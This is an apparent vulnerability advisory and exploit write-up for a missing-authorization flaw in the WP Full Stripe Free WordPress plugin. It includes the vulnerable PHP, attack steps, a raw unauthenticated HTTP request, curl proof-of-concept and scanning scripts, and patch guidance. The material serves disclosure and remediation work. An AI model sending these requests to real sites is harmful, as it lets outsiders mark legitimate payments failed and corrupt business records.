# CVE-2026-12432: WP Full Stripe Free <= 8.4.3 - Missing Authorization
## Overview
- **CVE ID**: CVE-2026-12432
- **CVSS Score**: 5.3 (Medium)
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
- **Affected**: Stripe Payment Forms by WP Full Pay <= 8.4.3
- **Patched**: >= 8.4.4
- **Published**: June 26, 2026
- **Last Updated**: June 27, 2026
- **Researcher**: Netwurm - VTDR e.V.i.G.
## Vulnerability Description
The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.
### Root Cause
The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:
```php
// wpfs-customer.php, Line 705-706
add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
```
The `update_failed_payment_status()` function (Line 3835-3865) performs:
- โ **NO capability check** (no `current_user_can()`)
- โ **NO nonce verification** (no `wp_verify_nonce()`)
- โ **NO logged-in check** (no `is_user_logged_in()`)
### Vulnerable Code
```php
// wpfs-customer.php, Line 3835-3865
function update_failed_payment_status() {
try {
$result = [];
$failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
$failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
$paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
$paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
// ... no auth check before processing ...
$updateData = [
'paid' => 0,
'captured' => 0,
'refunded' => 0
];
// Attacker can overwrite with controlled values
if ( $lastCharge ) {
$updateData['last_charge_status'] = $lastCharge->status;
$updateData['failure_code'] = $lastCharge->failure_code;
$updateData['failure_message'] = $lastCharge->failure_message;
} else {
$updateData['last_charge_status'] = 'failed';
$updateData['failure_code'] = $failureCode;
$updateData['failure_message'] = $failureMessage;
}
$this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
// ...
}
}
```
## Attack Vector
### Prerequisites
- Payment Intent ID must be known (exposed in browser during normal Stripe checkout)
- No authentication required
### Attack Steps
1. **Identify Target**: Find WordPress site with WP Full Stripe Free <= 8.4.3 installed
2. **Obtain Payment Intent ID**: Extract from Stripe.js checkout flow or prior transactions
3. **Send Malicious Request**: Craft POST request to admin-ajax.php with attacker-controlled parameters
### HTTP Request
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
```
## Impact Assessment
| Impact Area | Severity | Description |
|-------------|----------|-------------|
| **Integrity** | Medium | Attackers can mark successful payments as failed |
| **Confidentiality** | None | No data exposure |
| **Availability** | Low | Could disrupt business operations |
### Specific Impacts
1. **Payment Record Manipulation**: Attacker can modify payment status from "paid" to "failed"
2. **False Failure Codes**: Attacker can inject arbitrary failure codes/messages
3. **Social Engineering**: Could be used to defraud customers or dispute legitimate charges
4. **Audit Trail Corruption**: Business records can be falsified
## Proof of Concept (curl)
### Basic Detection
```bash
# Test if endpoint is accessible without authentication
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test_cve202612432" \
-d "failureCode=TEST_CODE" \
-d "failureMessage=TEST_MESSAGE"
# Expected response (vulnerable):
# {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
# The key indicator is that the endpoint responds WITHOUT requiring authentication
```
### Full PoC Script
```bash
#!/bin/bash
TARGET="https://TARGET"
# Check if vulnerable
echo "[*] Testing CVE-2026-12432..."
RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test_123" \
-d "failureCode=XSS" \
-d "failureMessage=INJECTED")
if echo "$RESPONSE" | grep -q "success"; then
echo "[+] VULNERABLE - Endpoint accessible without auth"
else
echo "[-] Not vulnerable or error"
fi
```
## Remediation
### Immediate Fix
Add authorization check to `wpfs-customer.php` at line 3835:
```php
function update_failed_payment_status() {
// ADD THIS CHECK
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
// ... rest of function
}
```
### Recommended Fix (by vendor)
Update to **WP Full Stripe Free >= 8.4.4**
```bash
# Via WordPress Admin
Dashboard > Plugins > WP Full Stripe > Update
# Via WP-CLI
wp plugin update wp-full-stripe-free
# Via SSH
wp plugin update wp-full-stripe-free --version=8.4.4
```
## Detection
### Manual Check
1. Check plugin version in WordPress admin
2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
3. Look for missing `current_user_can()` before AJAX handlers
### Automated Detection
```bash
# Check if vulnerable version is installed
curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
# Test AJAX endpoint
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
```
## References
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
- [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
- [Patchstack Database](https://patchstack.com/database/)
## W.P.E.F
- [W.P.E.F Telegram chanel #1](https://t.me/wpef0)
- [W.P.E.F Telegram chanel #2](https://t.me/wpef01)
--
## Timeline
- **June 26, 2026**: Vulnerability publicly disclosed
- **June 27, 2026**: CVE-2026-12432 published
- **Patch**: Update to >= 8.4.4Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation